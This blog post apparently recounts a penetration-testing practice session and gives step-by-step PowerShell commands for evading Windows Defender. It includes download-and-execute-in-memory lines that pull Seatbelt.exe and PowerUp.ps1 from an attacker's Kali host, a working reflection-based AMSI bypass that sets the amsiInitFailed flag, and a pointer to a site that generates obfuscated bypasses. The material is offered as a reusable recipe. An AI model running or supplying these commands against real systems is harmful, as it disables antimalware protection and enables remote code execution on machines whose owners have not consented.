I recently began reviewing some material to reinforce my understanding in some areas. During a session where I was practicing File Transfer techniques I came across a conundrum. I had to test many techniques for transferring files to Windows, but some of the techniques I was trying didn't work.

Well, that's not exactly right!

The commands ran successfully, but Windows Defender kept deleting the malicious files. I didn't have administrator rights on the server, so disabling Windows Defender was out of the picture.

None
Standing desk for when you absolutely need to stand on business!

Then I thought… maybe I can try a fileless technique! If Windows Defender deletes my tools from the machine because they are dropped on the disk, then maybe I can run the tool directly in memory. This is known as a fileless attack.

I tried using IEX to download a file and run it from the memory:

IEX (New-Object Net.WebClient).DownloadString('http://<Kali IP>:<Port>/Seatbelt.exe')

But I stumbled upon another obstacle. I was getting the following error on PowerShell:

This script contains malicious content and has been blocked by your antivirus software.

I was frustrated! But I had one more trick up my sleeve. I could try to bypass AMSI. So what is AMSI?

AMSI stands for Antimalware Scan Interface. It's a Windows security feature first introduced by Microsoft in Windows 10 and Windows Server 2016. AMSI acts as a standardized interface that allows applications and services to integrate with any antimalware product installed on a machine.

Before a script or code executes, the application sends the content to MASI, which passes it to the registered antimalware engine for scanning. If the engine flags it as malicious, the script's execution is blocked!

AMSI Bypass for executable files:

Solution: Bypass AMSI, so you can run commands with a fileless method. I ran the following commands to be able to download and run an executable (.exe) file in memory:

PS C:\> $bytes = (New-Object Net.WebClient).DownloadData('http://<kali-ip>:<port>/Seatbelt.exe')

PS C:\> $assembly = [System.Reflection.Assembly]::Load($bytes)

PS C:\> $entry = $assembly.EntryPoint

PS C:\> $entry.Invoke($null, [,string[]] @("-group=all"))

After entering the last command,seatbelt.exewas executed flawlessly on the PowerShell session!

AMSI Bypass for PowerShell scripts:

But what about if you need to run PowerShell scripts (.ps1)? Then that's a bit different. Use the following commands to be able to run the scripts:

PS C:\> $w = 'System.Management.Automation.A';$c = 'si';$m = 'Utils'

PS C:\> $assembly = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $w,$c,$m))

PS C:\> $field = $assembly.GetField(('am{0}InitFailed' -f $c),'NonPublic,Static')

PS C:\> $field.SetValue($null,$true)

Then, you can download your script using IEX to download a.ps1 and run it from memory. Use the following commands:

PS C:\> IEX (New-Object Net.WebClient).DownloadString('http://<kali-ip>:<port>/PowerUp.ps1')

PS C:\ Invoke-AllChecks

# Alternatively, you can run commands by using `;` and then typing your commands:
PS C:\ IEX (New-Object Net.WebClient).DownloadString('http://<kali-ip>:<port>/PowerUp.ps1'); Invoke-AllChecks

So that's it! Now you know what to do in a similar scenario! You learned how to bypass AMSI for executable files, PowerShell scripts, download them and run the scripts in memory!

Additionally, you can use this website to generate obfuscated bypasses that break or disable AMSI: https://amsi.fail/